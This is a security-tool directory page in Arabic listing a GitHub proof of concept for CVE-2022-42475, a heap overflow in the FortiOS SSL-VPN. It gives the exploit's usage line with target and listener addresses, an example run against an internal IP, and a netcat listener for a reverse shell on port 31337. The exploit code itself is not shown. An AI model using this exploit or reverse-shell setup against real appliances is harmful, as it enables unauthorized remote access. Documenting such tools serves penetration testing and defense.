Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/amir-hy/cve-2022-42475
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليماستغلال الملفات الثنائية
GitHubamir-hy/cve-2022-42475

cve-2022-42475

ثغرة تجاوز سعة المخزن المؤقت في FortiOS

عرض المستودع
711منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة تجاوز سعة المخزن المؤقت في FortiOS SSL-VPN

cve-2022-42475

https://nvd.nist.gov/vuln/detail/CVE-2022-42475 كود POC لاستغلال تجاوز سعة الكومة (Heap overflow) في خدمة SSLVPN الخاصة بـ Fortinet

ملاحظات

هذا POC سريع وغير مُحكم، ولن يعمل على الأرجح في أي مكان إلا إذا كنت محظوظًا للغاية. يعتمد على الإصدار ويحتوي على بعض الإزاحات الثابتة (hardcoded offsets) التي من المرجح أن تتغير من نظام إلى آخر.

الاستخدام

python3 cve-2022-42475.py rhost rport lhost 'command'

root@kitploit:~
python3 cve-2022-42475.py 192.168.10.1 8443 10.10.1.1 'ls -la /'

المستمع (Listener)

يستخدم POC أمر بايثون لإعداد شل عكسي على المنفذ 31337

root@kitploit:~
nc -lvnp 31337

إخلاء مسؤولية

هذا المشروع مصمم لأغراض تعليمية واختبار أخلاقي فقط. استخدام هذه الأداة لمهاجمة أهداف دون موافقة مسبقة متبادلة غير قانوني. المطورون لا يتحملون أي مسؤولية ولا يتحملون مسؤولية أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.

شكر وتقدير

شكر لـ Alain M - تويتر : @plopz0r

تنزيل الأداة